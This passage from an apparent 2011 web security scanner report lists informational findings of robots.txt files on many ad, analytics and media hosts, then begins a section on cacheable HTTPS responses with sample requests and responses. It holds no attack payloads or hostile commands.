Date: Sun, 04 Sep 2011 00:47:40 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "3212e-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www387
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

23.31. http://nmsacramento.112.2o7.net/b/ss/nmsacramento/1/H.20.3/s83257504000794

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nmsacramento.112.2o7.net
Path:   /b/ss/nmsacramento/1/H.20.3/s83257504000794

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: nmsacramento.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:04:37 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "dc05e-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www496
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

23.32. http://pixel.mathtag.com/sync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.mathtag.com
Path:   /sync

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/html
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x2 pid 0x6809 26633
Connection: keep-alive
Content-Length: 26

User-agent: *
Disallow: *

23.33. http://pixel.quantserve.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Mon, 05 Sep 2011 01:00:45 GMT
Content-Type: text/plain
Content-Length: 26
Date: Sun, 04 Sep 2011 01:00:45 GMT
Server: QS

User-agent: *
Disallow: /

23.34. http://premium.mookie1.com/2/nbc.com/ac@Bottom3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://premium.mookie1.com
Path:   /2/nbc.com/ac@Bottom3

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: premium.mookie1.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:15 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 03 Jun 2010 15:38:09 GMT
ETag: "d4820d-1a-48821fe531a40"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /

23.35. http://r.casalemedia.com/rum

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.casalemedia.com
Path:   /rum

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: r.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 01 Sep 2010 20:16:17 GMT
ETag: "1ad83a9-1a-5eb98640"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Expires: Sun, 04 Sep 2011 00:56:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:56:39 GMT
Connection: close

User-agent: *
Disallow: /

23.36. http://r.turn.com/r/beacon

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Date: Sun, 04 Sep 2011 00:47:36 GMT
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

23.37. http://rt.legolas-media.com/lgrt

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rt.legolas-media.com
Path:   /lgrt

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rt.legolas-media.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:52:19 GMT
Server: Apache
Last-Modified: Fri, 08 Jul 2011 17:46:27 GMT
ETag: "38100-1b-4a79269af42c0"
Accept-Ranges: bytes
Content-Length: 27
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /


23.38. http://s0.2mdn.net/2179194/HYSA_BLACK_RATE_300x250_40k.swf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /2179194/HYSA_BLACK_RATE_300x250_40k.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 04 Sep 2011 00:44:46 GMT
Expires: Mon, 05 Sep 2011 00:44:46 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 28
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 440

User-agent: *
Disallow: /

23.39. http://s6.scribdassets.com/aggregated/css/base.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s6.scribdassets.com
Path:   /aggregated/css/base.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s6.scribdassets.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:56:12 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n43 ( lax-agg-n52), ht-d lax-agg-n52.panthercdn.com
Cache-Control: max-age=604800
Expires: Thu, 08 Sep 2011 21:36:38 GMT
Age: 184774
Content-Length: 575
Content-Type: text/plain; charset=utf-8
Last-Modified: Thu, 01 Sep 2011 20:28:45 GMT
Connection: close

User-agent: *
Disallow: /search/
Disallow: /notifications/
Disallow: /analytics/
Disallow: /docinfo/
Disallow: /word/add_to_favorites/
Disallow: /word/comment_login/
Disallow: /word/document_url/
Disa
...[SNIP]...

23.40. http://s7.scribdassets.com/aggregated/css/web.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s7.scribdassets.com
Path:   /aggregated/css/web.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s7.scribdassets.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:56:13 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n45 ( lax-agg-n52), ht lax-agg-n52.panthercdn.com
Cache-Control: max-age=604800
Expires: Thu, 08 Sep 2011 21:36:38 GMT
Age: 184775
Content-Length: 575
Content-Type: text/plain; charset=utf-8
Last-Modified: Thu, 01 Sep 2011 20:28:45 GMT
Connection: close

User-agent: *
Disallow: /search/
Disallow: /notifications/
Disallow: /analytics/
Disallow: /docinfo/
Disallow: /word/add_to_favorites/
Disallow: /word/comment_login/
Disallow: /word/document_url/
Disa
...[SNIP]...

23.41. http://sales.reuters.com/pitches/roughcuts/rc728x90.swf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.reuters.com
Path:   /pitches/roughcuts/rc728x90.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: sales.reuters.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:41:04 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 20 May 2009 20:42:11 GMT
ETag: "176c40e-a0-46a5e0fc6cec0"
Accept-Ranges: bytes
Content-Length: 160
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /holidaycard/
Disallow: /marketing/
Disallow: /pitches/
Disallow: /index.html
Disallow: /invitation/
Disallow: /mediaguide/blog/

23.42. http://static.lingospot.com/js/all.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.lingospot.com
Path:   /js/all.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: static.lingospot.com

Response

HTTP/1.0 200 OK
Connection: close
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "1124621243"
Last-Modified: Mon, 18 Jun 2007 02:58:32 GMT
Content-Length: 27
Date: Sun, 04 Sep 2011 01:06:54 GMT
Server: lingo

User-agent: *
Disallow: /


23.43. http://sync.mathtag.com/sync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /sync

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: sync.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/html
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x2 pid 0x6809 26633
Connection: keep-alive
Content-Length: 26

User-agent: *
Disallow: *

23.44. http://tag.admeld.com/ad/js/741/mcclatchy/728x90/sacramento_sacbee

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/js/741/mcclatchy/728x90/sacramento_sacbee

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tag.admeld.com

Response

HTTP/1.0 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Last-Modified: Wed, 31 Aug 2011 21:42:54 GMT
ETag: "c280006-1a-4abd402b9f380"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Date: Sun, 04 Sep 2011 00:55:05 GMT
Connection: close

User-agent: *
Disallow: /

23.45. http://tcr.tynt.com/javascripts/Tracer.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tcr.tynt.com
Path:   /javascripts/Tracer.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tcr.tynt.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=1800
Content-Type: text/plain
Date: Sun, 04 Sep 2011 01:04:40 GMT
ETag: "3516526417"
Expires: Sun, 04 Sep 2011 01:34:39 GMT
Last-Modified: Wed, 11 Nov 2009 19:14:11 GMT
Server: EOS (lax001/54D9)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 271
Connection: close

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
User-Agent: *
Disallow: /T
...[SNIP]...

23.46. http://trc.taboolasyndication.com/reuters/trc/2/json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trc.taboolasyndication.com
Path:   /reuters/trc/2/json

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: trc.taboolasyndication.com

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Sun, 04 Sep 2011 01:01:05 GMT
Content-Type: text/plain
Content-Length: 65
Last-Modified: Thu, 25 Aug 2011 16:28:27 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

User-agent: *
Disallow: /

User-agent: Adsbot-Google
Disallow: /

23.47. http://turn.nexac.com/r/pu

Summary

Severity:   Information
Confidence:   Certain
Host:   http://turn.nexac.com
Path:   /r/pu

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: turn.nexac.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Date: Sun, 04 Sep 2011 00:57:25 GMT
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

23.48. http://usatoday1.112.2o7.net/b/ss/usatodayprod,gntbcstglobal/1/H.22.1/s84327528064604

Summary

Severity:   Information
Confidence:   Certain
Host:   http://usatoday1.112.2o7.net
Path:   /b/ss/usatodayprod,gntbcstglobal/1/H.22.1/s84327528064604

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: usatoday1.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:50:37 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "d9159-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www87
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

23.49. http://wa.proflowers.com/b/ss/proflodevelopment/1/H.22.1/s81099810544401

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wa.proflowers.com
Path:   /b/ss/proflodevelopment/1/H.22.1/s81099810544401

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: wa.proflowers.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:07:03 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "36a0e5-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www419
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

23.50. http://www.bizographics.com/collect/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizographics.com
Path:   /collect/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bizographics.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Date: Sun, 04 Sep 2011 00:48:11 GMT
Server: nginx/0.7.61
Content-Length: 26
Connection: Close

User-agent: *
Disallow: /

23.51. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.62.148.41
Connection: close
Content-Length: 2553

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

23.52. http://www.google-analytics.com/__utm.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google-analytics.com
Path:   /__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Sun, 04 Sep 2011 00:59:09 GMT
Expires: Sun, 04 Sep 2011 00:59:09 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js

23.53. http://www.googleadservices.com/pagead/conversion/1031221371/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/conversion/1031221371/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.googleadservices.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Thu, 11 Aug 2011 21:56:40 GMT
Date: Sun, 04 Sep 2011 00:51:10 GMT
Expires: Sun, 04 Sep 2011 00:51:10 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

23.54. http://www.linkedin.com/analytics/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.linkedin.com
Path:   /analytics/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.linkedin.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "1162225322"
Last-Modified: Wed, 06 Apr 2011 03:23:47 GMT
Content-Length: 24473
Connection: keep-alive
Date: Sun, 04 Sep 2011 00:47:42 GMT
Server: lighttpd

# Notice: If you would like to crawl LinkedIn,
# please email whitelistcrawl@linkedin.com to apply
# for white listing.

User-agent: Googlebot
Disallow: /addContacts*
Disallow: /addressBookExport*
D
...[SNIP]...

23.55. https://www.linkedin.com/secure/login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.linkedin.com
Path:   /secure/login

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.linkedin.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "-872004964"
Last-Modified: Wed, 06 Apr 2011 03:23:52 GMT
Content-Length: 24473
Connection: keep-alive
Date: Sun, 04 Sep 2011 01:19:15 GMT
Server: lighttpd

# Notice: If you would like to crawl LinkedIn,
# please email whitelistcrawl@linkedin.com to apply
# for white listing.

User-agent: Googlebot
Disallow: /addContacts*
Disallow: /addressBookExport*
D
...[SNIP]...

23.56. http://www.meebo.com/cim/sandbox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.meebo.com
Path:   /cim/sandbox.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.meebo.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 04 Sep 2011 01:10:22 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 99
Last-Modified: Tue, 09 Aug 2011 21:34:11 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /httpstest.html
Disallow: /httpsokay.html
Disallow: /mcmd/
Disallow: /cmd/

23.57. http://www.personalcreations.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.personalcreations.com

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/plain
Expires: Sun, 04 Sep 2011 09:20:54 GMT
Last-Modified: Thu, 04 Aug 2011 15:42:07 GMT
Accept-Ranges: bytes
ETag: "1CC52BD10BCB180"
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:02:36 GMT
Connection: close
Content-Length: 3584

User-agent: *
Disallow: http://www.personalcreations.com/unique-gifts-babies-PBABBSL
Disallow: http://www.personalcreations.com/new-baby-gifts-PBABBSL
Disallow: http://www.personalcreations.com/per
...[SNIP]...

23.58. http://www.publish2.com/newsgroups/state-worker.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.publish2.com
Path:   /newsgroups/state-worker.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.publish2.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:03:10 GMT
Server: Apache
Last-Modified: Tue, 30 Aug 2011 11:52:17 GMT
ETag: "7c2c8-33-a4acde40"
Accept-Ranges: bytes
Content-Length: 51
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /cache/
Disallow: /static/

23.59. http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /article/2011/09/04/us-weather-football-idUSTRE78222D20110904

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.reuters.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:47:48 GMT
Server: Apache
Expires: Sun, 4 Sep 2011 00:47:17 GMT
Content-Length: 213
Age: 30
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain;charset=UTF-8

User-agent: *
Disallow: /finance/stocks/option
Disallow: /finance/stocks/financialHighlights
Disallow: /search
Disallow: /beta
SITEMAP: http://www.reuters.com/sitemap_news_index.xml

User-agent: Pipl

...[SNIP]...

23.60. http://www.sacbee.com/notfound

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sacbee.com
Path:   /notfound

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sacbee.com

Response

HTTP/1.0 200 OK
Last-Modified: Mon, 12 Jul 2010 21:19:37 GMT
ETag: "13e0dcb-3bb-4c3b86e9"
Server: Apache/1.3.41
Content-Type: text/plain
Cache-Control: max-age=350
Date: Sun, 04 Sep 2011 00:58:06 GMT
Content-Length: 955
Connection: close

# update log
# 2009-08-26 - kparker @ MI 727-7946968 added, then removed 1198 and newhomes.
# 209-01-29 - pbuckley @ MI added sitemap2 and sitemap3
# 2008-07-23 - pbuckley @ MI
# 2007/03/05 - rwm

Us
...[SNIP]...

23.61. http://www.scribd.com/embeds/63688924/content

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scribd.com
Path:   /embeds/63688924/content

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.scribd.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sun, 04 Sep 2011 00:55:48 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 575
Last-Modified: Fri, 02 Sep 2011 20:14:57 GMT
Connection: close
Vary: Accept-Encoding
X-Bot: 1
Accept-Ranges: bytes

User-agent: *
Disallow: /search/
Disallow: /notifications/
Disallow: /analytics/
Disallow: /docinfo/
Disallow: /word/add_to_favorites/
Disallow: /word/comment_login/
Disallow: /word/document_url/
Disa
...[SNIP]...

23.62. http://www.sprint.com/index_c.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sprint.com
Path:   /index_c.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sprint.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:47:36 GMT
Server: Apache/2.2.14 (Red Hat)
Last-Modified: Tue, 29 Jun 2010 17:26:58 GMT
ETag: "52042d-7f-48a2e8b5b7c80"
Accept-Ranges: bytes
Content-Length: 127
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /localbusiness/
# Prevent duplicate localbusiness content from being indexed
Disallow: /index_c.html

23.63. https://www.sprint.net/performance

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /performance

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sprint.net

Response

HTTP/1.1 200 OK
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 00:47:33 GMT
Server: Apache/2.2.4 (Unix)
Last-Modified: Tue, 11 Dec 2007 15:43:44 GMT
ETag: "bc18-1d-93e86c00"
Accept-Ranges: bytes
Content-Length: 29
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /ip/

23.64. http://www.wisdomtree.com/bannerads/dyneld2010fall/dyneld2010falllp.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wisdomtree.com
Path:   /bannerads/dyneld2010fall/dyneld2010falllp.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wisdomtree.com

Response

HTTP/1.1 200 OK
Content-Length: 92
Content-Type: text/plain
Last-Modified: Wed, 16 Jun 2010 19:39:36 GMT
Accept-Ranges: bytes
ETag: "404ea78bdcb1:4c1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:20:03 GMT
Connection: close

User-agent: *
Disallow: /_Archive/
Disallow: /admin/
Disallow: /css/
Disallow: /scripts/

23.65. http://www.wunderground.com/auto/sacbee/CA/Sacramento.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wunderground.com
Path:   /auto/sacbee/CA/Sacramento.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wunderground.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:10:55 GMT
Server: Apache/1.3.33 (Unix) PHP/4.4.0
Last-Modified: Thu, 03 Mar 2011 23:44:18 GMT
Accept-Ranges: bytes
Content-Length: 27683
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /AS5000/
Disallow: /history/
Disallow: /geo/
Disallow: /ndfdimagery/
Disallow: /weatherstation/
Disallow: /auto/927/weatherstation/
Disallow: /auto/1000tourtemplate/weatherstat
...[SNIP]...

23.66. http://www.youtube.com/embed/xXftjfC3b5o

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /embed/xXftjfC3b5o

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.youtube.com

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 00:55:45 GMT
Server: Apache
Last-Modified: Thu, 01 Sep 2011 18:22:34 GMT
ETag: "21b-4abe5541eae80"
Accept-Ranges: bytes
Content-Length: 539
Vary: Accept-Encoding
Content-Type: text/plain

# robots.txt file for YouTube
# Created in the distant future (the year 2000) after
# the robotic uprising of the mid 90's which wiped out all humans.

User-agent: Mediapartners-Google*
Disallow:

Use
...[SNIP]...

24. Cacheable HTTPS response
There are 5 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:


24.1. https://socialize.gigya.com/gs/bookmark.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://socialize.gigya.com
Path:   /gs/bookmark.aspx

Request

GET /gs/bookmark.aspx HTTP/1.1
Host: socialize.gigya.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-XSS-Protection: 0
X-AspNet-Version: 2.0.50727
X-Server: web517
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
Date: Sun, 04 Sep 2011 01:18:42 GMT
Connection: close
Content-Length: 2076


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Sharing..
...[SNIP]...

24.2. https://sprintlb.ehosts.net/narouter/eQueueCheck.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sprintlb.ehosts.net
Path:   /narouter/eQueueCheck.aspx

Request

GET /narouter/eQueueCheck.aspx HTTP/1.1
Host: sprintlb.ehosts.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 01:19:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 400


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>CIM Dispatcher</title>
       <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
       <meta name=
...[SNIP]...

24.3. https://www.sprint.net/performance/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /performance/

Request

GET /performance/ HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 200 OK
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 00:47:32 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 12931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...

24.4. https://www.sprint.net/performance/gen_line_xml.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /performance/gen_line_xml.php

Request

GET /performance/gen_line_xml.php HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
Referer: https://www.sprint.net/performance/performance.swf
